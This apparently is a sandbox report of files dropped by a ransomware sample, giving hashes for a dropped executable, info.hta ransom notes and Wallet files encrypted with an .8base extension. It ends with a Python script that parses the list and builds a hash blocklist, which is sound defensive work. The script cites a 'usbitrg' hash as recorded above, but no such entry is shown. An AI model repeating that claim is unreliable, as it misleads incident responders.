SHA256 a16113a66b1c36f919b5f7eaa3fb7aa8e0ba9e057823861aabea703cc06a04c0
SHA512 51f4ee06a8d8bf1121083bf4383433160f16c68d1fe4c44e5d0e0529910d27ba8446c7a4bef359b990574d1d61563da30139c6d09ad0ad1a5b5c7748b8da08f3

C:\Users\Admin\AppData\Roaming\Rhyivhytef.exe

MD5 ba671a266b0fb8320d3127f1f797da8c
SHA1 494d3fdac306a9bb59b099cc8a10b8e382c7fd2d
SHA256 6fd1e716c8032d59d693b1468f4452cffd56f6f2dea391444d3c3cc0092b4bec
SHA512 2b4eadf6dc8bffde13e761e6d2c47f406c8c2e9ae4e987bee0efefca64f7cadd266238fe71a62620235c426618be10e2a541641565a2cd07723b88a18c447bf9

C:\Users\Admin\AppData\Roaming\tertdag

MD5 14d53b6bca02208a2c5b0080a3344175
SHA1 e079d5eab6645dcbf35d7eec5b593a16bbfb7b4e
SHA256 56dd792dd5fef77693fda971d8b33f014e28a47bce927b5714a9a1303e4cbbac
SHA512 70370ea4339a85f5dd91d889e676d254f21e3118c07a42fd78c3aa4fb7673ef42a2cd487666f5391041b57f00de44bfea59127ba964698a92155a67985633055

C:\info.hta

MD5 0d971447375d95699a5e0e08b4e06e99
SHA1 c9267226e75afc88b515b1d7eddb6e2482ba5acf
SHA256 ce9f46b5cf76d34af82e51ec9c7ad558c09e20b2fb1b26d4ece8c040b549ee84
SHA512 9bb7d539b343234bbdcabde47fab5831c6ce5b1484180d7759ae8995bc63271bea4cbdd68ca64a9a40686a9961bfb56f3a02dc0b5fe176b51befbd693d130f56

C:\Users\Admin\Desktop\info.hta

MD5 0d971447375d95699a5e0e08b4e06e99
SHA1 c9267226e75afc88b515b1d7eddb6e2482ba5acf
SHA256 ce9f46b5cf76d34af82e51ec9c7ad558c09e20b2fb1b26d4ece8c040b549ee84
SHA512 9bb7d539b343234bbdcabde47fab5831c6ce5b1484180d7759ae8995bc63271bea4cbdd68ca64a9a40686a9961bfb56f3a02dc0b5fe176b51befbd693d130f56

C:\users\public\desktop\info.hta

MD5 0d971447375d95699a5e0e08b4e06e99
SHA1 c9267226e75afc88b515b1d7eddb6e2482ba5acf
SHA256 ce9f46b5cf76d34af82e51ec9c7ad558c09e20b2fb1b26d4ece8c040b549ee84
SHA512 9bb7d539b343234bbdcabde47fab5831c6ce5b1484180d7759ae8995bc63271bea4cbdd68ca64a9a40686a9961bfb56f3a02dc0b5fe176b51befbd693d130f56

C:\Users\Admin\AppData\Local\Temp\F67A\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.dll.id[18CA63B3-3483].[[email protected]].8base

MD5 b09d3cc034d47d9e871b389f61f4a770
SHA1 752a0e72498667fb9bcea8c50e553eec26ada599
SHA256 cee6da30438bc7547140aad7f84f00fcec8b959afbdeb0d5551eea74863a100b
SHA512 c6acc7bc22e7bce90d6a489f930b31e561664bd1cb6279a4e4640e9fe9bbe965481d7b7453e69664b9b61b44e4755b5cfa36df3d5d971377ec1ade12cc7991c9

C:\Users\Admin\AppData\Local\Temp\F67A\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe.id[18CA63B3-3483].[[email protected]].8base

MD5 eed39da9e5b01b5f198190fc3775fd18
SHA1 7ea3977b931e84bc0da264154ae058b2a4ef0e23
SHA256 b467bae7961ef4f24d825136aa31449d4d349fc470dab83385d83c6bf0fa5304
SHA512 17162a257765e8a7136f7012307bd312eb5f4f8555c626857f555e3b8f28aef27fcddfc0dff0d3126a95787751ee52bcdddbb014df0a749aca0ea78c7469c85d

C:\Users\Admin\AppData\Local\Temp\F67A\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe.xml.id[18CA63B3-3483].[[email protected]].8base

MD5 b8e7366ec9ebdabff87b5f9c4d9ac1c0
SHA1 5b909af102e06b197504edc82f274029165dba6c
SHA256 a08c0d3afa68fabf6ca9ede20da0f7d2f8c406f11f195f78ef279782136c6d51
SHA512 7aeee6eae6a5a456c3aca5ea73d54cf87464f7e5e580f6afe069076a30a4db4645928c4c14e6d5d4f97838a59fb7ea0b36dd4488a4bfb30e42f5951dde8a5c72

C:\Users\Admin\AppData\Local\Temp\F67A\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe.xml.id[18CA63B3-3483].[[email protected]].8base

MD5 66f8876b1cc10e3bf17a2e97b614a716
SHA1 e8ccbc0a625a6b7fd2b4e9f15122a74f7b5aefe6
SHA256 79f73c2f69c0421651a8e34609ab5aa961782d0bd628ab4e2cb7d7d797f1fa65
SHA512 95dfa474f5d72b2fa502d05590f3613d7d4b728107268ba0b450aa0979f076b2769a40e41152d967c671b7077433fb4d8abbc90509d49e7419017e08341a8382

C:\Users\Admin\AppData\Local\Temp\F67A\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe.xml.id[18CA63B3-3483].[[email protected]].8base

MD5 27d04ab21b5a61609d51cffa378b0c0a
SHA1 7eb94404f90e49d44acdb416af5aa9fd5a50d1c3
SHA256 c04f462d22700bc7fd70fa3b6edd43b9362b110c900d63c8377639b947675113
SHA512 3d1e25ef4c0755a60f239ee49156da1932eb820ba2d97ee8529f90f9620a7e1de00e1475e726ac797eb0b1c64b80b06955edb85a35cfc196c4a469a2b0f8c8f5

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dll

MD5 d09724c29a8f321f2f9c552de6ef6afa
SHA1 d6ce3d3a973695f4f770e7fb3fcb5e2f3df592a3
SHA256 23cc82878957683184fbd0e3098e9e6858978bf78d7812c6d7470ebdc79d1c5c
SHA512 cc8db1b0c4bbd94dfc8a669cd6accf6fa29dc1034ce03d9dae53d6ce117bb86b432bf040fb53230b612c6e9a325e58acc8ebb600f760a8d9d6a383ce751fd6ed

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dll

MD5 1097d1e58872f3cf58f78730a697ce4b
SHA1 96db4e4763a957b28dd80ec1e43eb27367869b86
SHA256 83ec0be293b19d00eca4ae51f16621753e1d2b11248786b25a1abaae6230bdef
SHA512 b933eac4eaabacc51069a72b24b649b980aea251b1b87270ff4ffea12de9368d5447cdbe748ac7faf2805548b896c8499f9eceeed2f5efd0c684f94360940351

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dll

MD5 02557c141c9e153c2b7987b79a3a2dd7
SHA1 a054761382ee68608b6a3b62b68138dc205f576b
SHA256 207c587e769e2655669bd3ce1d28a00bcac08f023013735f026f65c0e3baa6f4
SHA512 a37e29c115bcb9956b1f8fd2022f2e3966c1fa2a0efa5c2ee2d14bc5c41bfddae0deea4d481a681d13ec58e9dec41e7565f8b4eb1c10f2c44c03e58bdd2792b3

C:\Users\Admin\AppData\Roaming\Rhyivhytef.exe

MD5 e7ac55d61ab9cfcf180c92c1381a2fa1
SHA1 f79fe555c492a9effe26ead87ec7eb3c53899083
SHA256 afddec37cdc1d196a1136e2252e925c0dcfe587963069d78775e0f174ae9cfe3
SHA512 e3fa85d3af3625384ecea090a7c205325825a1b91ad43e1f86f56a719ad733d71b4be9c34edd03d8ff774e28b3feb605dc073f66f4a01359f8e4bad5b8bcfae2
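The dropped-file list above is only a hash table until it is pulled into tooling. The Python script below is an added example, not part of the sandbox's own output: it parses a handful of the records above (embedded as a constructed sample with the SHA1/SHA512 lines omitted, and one ransom-note record deliberately repeated the way the report repeats files written more than once), collapses the repeats, recognises the Phobos-style `<original>.id[<victim id>].[<contact>].<ext>` naming of the encrypted files so the victim ID, appended extension and original filename can be recovered, and emits the SHA256 values of the dropped binaries as a blocklist. `SUBMITTED_SHA256` is assumed to be the submitted sample's hash (the value recorded for the `AppData\Roaming\usbitrg` copies); the contact address inside the encrypted names is shown redacted as `[email protected]` on this page, so the pattern does not assume a real e-mail shape.

```python
import re

# Assumed: SHA256 of the submitted sample (the value recorded above for the
# AppData\Roaming\usbitrg copies).
SUBMITTED_SHA256 = "e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0"

PATH_RE = re.compile(r"^[A-Za-z]:\\")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-fA-F]+)$")
# Phobos-style encrypted name: <original>.id[<victim id>].[<contact>].<ext>
# The contact is shown redacted as "[email protected]" on this page, so the
# group is matched lazily rather than with [^\]]+.
ENCRYPTED_RE = re.compile(
    r"\.id\[(?P<victim>[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4})\]"
    r"\.\[(?P<contact>.+?)\]\.(?P<ext>[A-Za-z0-9]+)$"
)
RANSOM_NOTES = {"info.hta"}

# Constructed sample: five records copied from the list above (SHA1/SHA512
# lines omitted), including one deliberately repeated ransom-note entry.
SAMPLE_REPORT = r"""
C:\Users\Admin\AppData\Roaming\usbitrg

MD5 9769c181ecef69544bbb2f974b8c0e10
SHA256 e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0

C:\info.hta

MD5 0d971447375d95699a5e0e08b4e06e99
SHA256 ce9f46b5cf76d34af82e51ec9c7ad558c09e20b2fb1b26d4ece8c040b549ee84

C:\info.hta

MD5 0d971447375d95699a5e0e08b4e06e99
SHA256 ce9f46b5cf76d34af82e51ec9c7ad558c09e20b2fb1b26d4ece8c040b549ee84

C:\Users\Admin\AppData\Local\Temp\F67A\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe.id[18CA63B3-3483].[[email protected]].8base

MD5 eed39da9e5b01b5f198190fc3775fd18
SHA256 b467bae7961ef4f24d825136aa31449d4d349fc470dab83385d83c6bf0fa5304

C:\Users\Admin\AppData\Roaming\Rhyivhytef.exe

MD5 ba671a266b0fb8320d3127f1f797da8c
SHA256 6fd1e716c8032d59d693b1468f4452cffd56f6f2dea391444d3c3cc0092b4bec
"""


def parse_files(text):
    """Turn 'path / MD5 x / SHA256 y ...' records into dicts keyed by hash name."""
    entries, cur = [], None
    for line in (l.strip() for l in text.splitlines()):
        if PATH_RE.match(line):
            cur = {"path": line}
            entries.append(cur)
        elif cur is not None and (m := HASH_RE.match(line)):
            cur[m.group(1).lower()] = m.group(2).lower()
    return entries


def classify(entry):
    """Label a file by its role; for encrypted files, pull out victim id, contact, extension and original name."""
    name = entry["path"].rsplit("\\", 1)[-1]
    if m := ENCRYPTED_RE.search(name):
        return "encrypted", {**m.groupdict(), "original": name[: m.start()]}
    if name.lower() in RANSOM_NOTES:
        return "ransom_note", {}
    if entry.get("sha256") == SUBMITTED_SHA256:
        return "sample_copy", {}
    return "dropped", {}


def summarize(text):
    """Collapse repeated records (the report lists a file once per write) and group by role."""
    seen, out = set(), {"encrypted": [], "ransom_note": [], "sample_copy": [],
                        "dropped": [], "victim_ids": set(), "extensions": set()}
    for e in parse_files(text):
        key = (e["path"], e.get("sha256"))
        if key in seen:
            continue
        seen.add(key)
        kind, info = classify(e)
        out[kind].append({**e, **info})
        if kind == "encrypted":
            out["victim_ids"].add(info["victim"])
            out["extensions"].add(info["ext"])
    return out


def blocklist(text):
    """SHA256 of dropped binaries only: encrypted files and the note are per-victim, not stable indicators."""
    s = summarize(text)
    return sorted({e["sha256"] for e in s["sample_copy"] + s["dropped"] if "sha256" in e})


if __name__ == "__main__":
    s = summarize(SAMPLE_REPORT)
    for kind in ("sample_copy", "dropped", "ransom_note", "encrypted"):
        for e in s[kind]:
            print(f"{kind:12} {e['path']}")
    print("victim ids:", sorted(s["victim_ids"]), "extensions:", sorted(s["extensions"]))
    print("blocklist:", *blocklist(SAMPLE_REPORT), sep="\n")
```

Run it directly to see the grouping. The `usbitrg` copy carries the sample's own hash, so it is the indicator worth blocking; the `.8base` files are left out of the blocklist because every encrypted file hashes differently and the victim ID in their names changes per infection, which is why the script reports the ID and extension separately for matching on filenames rather than on hashes.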